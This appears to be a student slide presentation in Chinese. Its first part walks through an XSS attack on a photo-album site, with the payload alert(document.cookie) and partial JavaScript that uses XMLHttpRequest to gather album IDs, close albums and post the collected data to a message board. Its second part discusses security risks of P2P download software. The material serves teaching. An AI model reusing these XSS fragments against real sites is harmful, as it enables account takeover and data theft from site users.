Download presentation
Presentation is loading. Please wait.
1
一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮
國立高雄大學 資訊管理學系 A 洪忠福
2
一、 XSS 實做經驗 – x 名小站
3
嵌入 Javascript
4
alert ( document.cookie);
測試 Javascript alert ( document.cookie);
5
嵌入之前的正常網頁
6
嵌入之後的網頁
7
執行ajax動作(取得所有相簿ID):
8
執行ajax動作(取得所有相簿第一張照片):
9
執行ajax動作(將資訊紀錄在留言板):
10
執行ajax動作(將資訊紀錄在留言板):
11
將相簿關閉:
12
分析 GET 與 POST:
13
分析 GET 與 POST:
14
brequest.onreadystatechange = parseBook;
部份程式碼 ( 取得相簿id ): brequest.onreadystatechange = parseBook; brequest.open('GET',' var all = brequest.responseText; var reg = /option value=\"\d+?\">/ig; if (all!=null) a = all.match(reg); if (a == null) return; var alen = a.length; for (var i= 0; i<alen;i++){ a[i] = a[i].replace(/option value=|[>\"]/g,"") }
15
部份程式碼 (發送xmlHttpRequest):
var fstr = "%E7%B7%A8%E8%BC%AF%E7%9B%B8%E7%B0%BF"; var sendStr = "cid=0&page=0&.c=UyofthX32jh&.t= "; sendStr += “&func_mod=”+fstr + bstr; request.onreadystatechange = ready; request.open('POST',' false); request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); request.send(sendStr);
16
for (var i=0;i<len;i++){ str += all[i] +"%0D%0A"; }
部份程式碼 (留言): var str = ""; for (var i=0;i<len;i++){ str += all[i] +"%0D%0A"; } var sendstr = “.c=FKIBhhC9SN4&.t= &userid=MyID"; sendstr += “&used_name=sess_name&sess_name=MyID"; sendstr += "& =&url=&rem=true&isCloak=true&title=Test&content=" + str; sendstr += "&leavemsg=%E7%95%99%E8%A8%80"; srequest.onreadystatechange = lastP; srequest.open('POST',' srequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); srequest.send(sendstr);
![for (var i=0;i<len;i++){ str += all[i] + %0D%0A ; }](http://slidesplayer.com/slide/16743344/97/images/16/for+%28var+i%3D0%3Bi%3Clen%3Bi%2B%2B%29%7B+str+%2B%3D+all%5Bi%5D+%2B+%250D%250A+%3B+%7D.jpg "部份程式碼 (留言): var str = ; for (var i=0;i<len;i++){ str += all[i] + %0D%0A ; } var sendstr = .c=FKIBhhC9SN4&.t= &userid=MyID ; sendstr += &used_name=sess_name&sess_name=MyID ; sendstr += & =&url=&rem=true&isCloak=true&title=Test&content= + str; sendstr += &leavemsg=%E7%95%99%E8%A8%80 ; srequest.onreadystatechange = lastP; srequest.open( POST , ,true); srequest.setRequestHeader( Content-Type , application/x-www-form-urlencoded ); srequest.send(sendstr);")
17
二、 P2P 下載軟體之安全疑慮
18
P2P 下載軟體簡介 Peer to Peer:點對點通訊傳輸工具
檔案傳送採取用戶與用戶的通訊模式,傳送檔案的時候,可以同時連接多個下載點,分散式下載檔案 快速完成檔案下載的目標 最普遍廣泛的用途:「盜版物交流」 常見的有:Foxy, eDonkey, BT 等
19
P2P 可能影響網安的問題 1. 使用者門戶大開 2. 佔用頻寬、癱瘓網路 3. 硬體設備損害
20
1. 使用者門戶大開 沒有開啟或安裝防毒軟體、防火牆 抓到假檔、惡意程式 將重要目錄開放分享 電腦遭受攻擊 植入病毒、木馬 洩漏系統檔案
個人資料 各種帳號密碼
21
實例:
22
2. 佔用頻寬、癱瘓網路 P2P 下載軟體的分享制度 上傳與下載的限制 最恐怖的軟體:Foxy 影響人際關係
搜尋時暴力的發出 request 無法調整上傳下載限制 影響人際關係
23
3. 硬體設備損害 處理軟體發出的 request 硬碟的讀寫頻繁 不連續的儲存空間,影響讀取與寫入的動作 改善:系統重整、預先配置硬碟
24
佔用 CPU :
25
The End
Similar presentations
